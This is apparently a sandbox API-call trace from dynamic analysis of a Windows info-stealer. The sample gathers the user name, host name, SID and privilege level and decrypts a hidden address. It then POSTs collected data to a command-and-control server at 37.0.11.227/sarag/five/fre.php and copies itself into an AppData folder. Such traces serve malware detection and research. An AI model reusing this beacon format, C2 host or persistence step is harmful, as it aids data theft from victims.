0x690000 [0150.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7) returned 0x6ab380 [0150.068] GetProcessHeap () returned 0x690000 [0150.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0150.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.069] GetUserNameW (in: lpBuffer=0x6ad270, pcbBuffer=0x19fb74 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb74) returned 1 [0150.069] GetProcessHeap () returned 0x690000 [0150.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0150.070] GetProcessHeap () returned 0x690000 [0150.070] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0150.070] GetComputerNameW (in: lpBuffer=0x6ad270, nSize=0x19fb74 | out: lpBuffer="XC64ZB", nSize=0x19fb74) returned 1 [0150.070] GetProcessHeap () returned 0x690000 [0150.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0150.071] GetCurrentThread () returned 0xfffffffe [0150.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.072] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x0) returned 0 [0150.073] GetLastError () returned 0x3f0 [0150.073] GetCurrentProcess () returned 0xffffffff [0150.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb74 | out: TokenHandle=0x19fb74*=0x248) returned 1 [0150.074] GetProcessHeap () returned 0x690000 [0150.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0150.074] GetProcessHeap () returned 0x690000 [0150.074] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ab670 [0150.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.075] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fb70 | out: TokenInformation=0x0, ReturnLength=0x19fb70) returned 0 [0150.075] GetProcessHeap () returned 0x690000 [0150.075] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0150.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.076] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x1, TokenInformation=0x6a88b0, TokenInformationLength=0x24, ReturnLength=0x19fb70 | out: TokenInformation=0x6a88b0, ReturnLength=0x19fb70) returned 1 [0150.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.078] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x6a88b8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x6ad270, cchName=0x19fb60, ReferencedDomainName=0x6ab670, cchReferencedDomainName=0x19fb64, peUse=0x19fb5c | out: Name="RDhJ0CNFevzX", cchName=0x19fb60, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fb64, peUse=0x19fb5c) returned 1 [0150.080] GetProcessHeap () returned 0x690000 [0150.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f44) returned 0x6b07a8 [0150.080] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.081] wvsprintfW (in: param_1=0x6b07a8, param_2="%s", arglist=0x19fb4c | out: param_1="XC64ZB") returned 6 [0150.081] GetProcessHeap () returned 0x690000 [0150.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x10) returned 0x6aeb80 [0150.081] GetProcessHeap () returned 0x690000 [0150.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b07a8 | out: hHeap=0x690000) returned 1 [0150.083] GetProcessHeap () returned 0x690000 [0150.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0150.084] CloseHandle (hObject=0x248) returned 1 [0150.084] GetProcessHeap () returned 0x690000 [0150.084] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab670 | out: hHeap=0x690000) returned 1 [0150.084] GetProcessHeap () returned 0x690000 [0150.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0150.085] GetProcessHeap () returned 0x690000 [0150.085] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb80 | out: hHeap=0x690000) returned 1 [0150.103] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.103] GetDesktopWindow () returned 0x10010 [0150.104] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.105] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fb68 | out: lpRect=0x19fb68) returned 1 [0150.105] GetProcessHeap () returned 0x690000 [0150.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8) returned 0x6ab340 [0150.105] GetProcessHeap () returned 0x690000 [0150.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0150.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.106] GetUserNameW (in: lpBuffer=0x19f968, pcbBuffer=0x19fb70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fb70) returned 1 [0150.107] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x76540000 [0150.108] GetProcAddress (hModule=0x76540000, lpProcName="NetUserGetInfo") returned 0x6c7e33a0 [0150.108] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fb74 | out: bufptr=0x6a4268*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xbbe6b, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0150.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.113] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fb60, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x6aebf8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0150.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.114] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x6aebf8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0150.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.115] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5507)) [0150.115] GetProcessHeap () returned 0x690000 [0150.115] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0150.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.116] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0150.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.150] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x6aa530) returned 1 [0150.158] GetProcessHeap () returned 0x690000 [0150.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0150.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.159] CryptImportKey (in: hProv=0x6aa530, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x69d5e8) returned 1 [0150.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.161] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0150.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.166] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0150.166] GetProcessHeap () returned 0x690000 [0150.166] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0150.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.167] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19f974 | out: pbData=0x6a4730, pdwDataLen=0x19f974) returned 1 [0150.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.168] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0150.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.169] CryptReleaseContext (hProv=0x6aa530, dwFlags=0x0) returned 1 [0150.169] GetProcessHeap () returned 0x690000 [0150.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6ad270 [0150.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.170] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0150.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.171] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0150.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.172] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0150.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.173] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0150.173] GetProcessHeap () returned 0x690000 [0150.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0150.173] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x0) returned 11001 [0150.694] GetProcessHeap () returned 0x690000 [0150.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0150.695] GetProcessHeap () returned 0x690000 [0150.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0150.695] GetProcessHeap () returned 0x690000 [0150.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0150.696] GetProcessHeap () returned 0x690000 [0150.696] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0150.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.697] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0150.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.704] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x6aa530) returned 1 [0150.715] GetProcessHeap () returned 0x690000 [0150.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0150.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.726] CryptImportKey (in: hProv=0x6aa530, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x69cfa8) returned 1 [0150.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.727] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0150.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.728] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0150.728] GetProcessHeap () returned 0x690000 [0150.729] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0150.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.730] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19f974 | out: pbData=0x6a4340, pdwDataLen=0x19f974) returned 1 [0150.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.731] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0150.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.732] CryptReleaseContext (hProv=0x6aa530, dwFlags=0x0) returned 1 [0150.732] GetProcessHeap () returned 0x690000 [0150.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6ad270 [0150.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.733] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0150.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.734] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0150.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.735] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0150.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.737] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0150.737] GetProcessHeap () returned 0x690000 [0150.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0150.737] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb98*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0150.737] GetProcessHeap () returned 0x690000 [0150.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0150.737] socket (af=2, type=1, protocol=6) returned 0x25c [0150.737] connect (s=0x25c, name=0x6aeb98*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0150.776] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb98*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0150.776] GetProcessHeap () returned 0x690000 [0150.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6abb38 [0150.776] GetProcessHeap () returned 0x690000 [0150.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0150.777] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.778] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0150.778] GetProcessHeap () returned 0x690000 [0150.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b47d8 [0150.778] GetProcessHeap () returned 0x690000 [0150.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0150.779] GetProcessHeap () returned 0x690000 [0150.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a42f8 [0150.779] GetProcessHeap () returned 0x690000 [0150.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0150.780] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.781] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 186\r\nConnection: close\r\n\r\n") returned 242 [0150.781] GetProcessHeap () returned 0x690000 [0150.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6b4898 [0150.781] GetProcessHeap () returned 0x690000 [0150.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0150.782] send (s=0x25c, buf=0x6b4898*, len=242, flags=0) returned 242 [0150.782] send (s=0x25c, buf=0x6af418*, len=186, flags=0) returned 186 [0150.783] GetProcessHeap () returned 0x690000 [0150.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0150.783] recv (in: s=0x25c, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 196 [0150.880] GetProcessHeap () returned 0x690000 [0150.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b4898 | out: hHeap=0x690000) returned 1 [0150.880] GetProcessHeap () returned 0x690000 [0150.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a42f8 | out: hHeap=0x690000) returned 1 [0150.881] GetProcessHeap () returned 0x690000 [0150.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b47d8 | out: hHeap=0x690000) returned 1 [0150.881] GetProcessHeap () returned 0x690000 [0150.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abb38 | out: hHeap=0x690000) returned 1 [0150.881] closesocket (s=0x25c) returned 0 [0150.882] GetProcessHeap () returned 0x690000 [0150.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0150.882] GetProcessHeap () returned 0x690000 [0150.882] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad270 | out: hHeap=0x690000) returned 1 [0150.883] GetProcessHeap () returned 0x690000 [0150.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0150.883] GetProcessHeap () returned 0x690000 [0150.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0150.883] GetProcessHeap () returned 0x690000 [0150.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0150.883] GetProcessHeap () returned 0x690000 [0150.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af418 | out: hHeap=0x690000) returned 1 [0150.884] GetProcessHeap () returned 0x690000 [0150.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeb68 | out: hHeap=0x690000) returned 1 [0150.884] GetProcessHeap () returned 0x690000 [0150.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0150.884] GetProcessHeap () returned 0x690000 [0150.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4fc8 | out: hHeap=0x690000) returned 1 [0150.884] GetProcessHeap () returned 0x690000 [0150.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aebe0 | out: hHeap=0x690000) returned 1 [0150.884] GetProcessHeap () returned 0x690000 [0150.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6ad270 [0150.885] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6ad270, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe")) returned 0x2f [0150.885] GetProcessHeap () returned 0x690000 [0150.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aba40 [0150.885] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0150.886] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aba40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0150.886] GetProcessHeap () returned 0x690000 [0150.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f58) returned 0x6b27b0 [0150.888] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.889] wvsprintfW (in: param_1=0x6b27b0, param_2="%s\\%s\\%s.exe", arglist=0x19fd44 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0150.889] GetProcessHeap () returned 0x690000 [0150.889] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a7970 [0150.889] GetProcessHeap () returned 0x690000 [0150.890] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0150.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0150.891] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 0x0 [0150.891] GetProcessHeap () returned 0x690000 [0150.891] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6b27b0 [0150.892] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.892] wvsprintfW (in: param_1=0x6b27b0, param_2="%s\\%s", arglist=0x19fd60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0150.892] GetProcessHeap () returned 0x690000 [0150.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6acb98 [0150.893] GetProcessHeap () returned 0x690000 [0150.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0150.894] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0150.895] MoveFileExW (lpExistingFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dtlrkp.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dtlrkp.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), dwFlags=0x1) returned 1 [0150.896] GetProcessHeap () returned 0x690000 [0150.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6abc50 [0150.897] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0150.897] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6abc50 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0150.898] GetProcessHeap () returned 0x690000 [0150.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6b27b0 [0150.899] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.899] wvsprintfW (in: param_1=0x6b27b0, param_2="%s\\%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0150.900] GetProcessHeap () returned 0x690000 [0150.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6abe60 [0150.900] GetProcessHeap () returned 0x690000 [0150.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0150.901] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0150.901] GetProcessHeap () returned 0x690000 [0150.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f50) returned 0x6b27b0 [0150.902] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0150.903] wvsprintfW (in: param_1=0x6b27b0, param_2="%s\\%s.%s", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0150.903] GetProcessHeap () returned 0x690000 [0150.903] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x72) returned 0x6a7ef0 [0150.903] GetProcessHeap () returned 0x690000 [0150.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0150.903] GetProcessHeap () returned 0x690000 [0150.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abe60 | out: hHeap=0x690000) returned 1 [0150.904] GetProcessHeap () returned 0x690000 [0150.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abc50 | out: hHeap=0x690000) returned 1 [0150.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0150.905] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fcfc, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fd04 | out: pSid=0x19fd04*=0x6aebe0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, 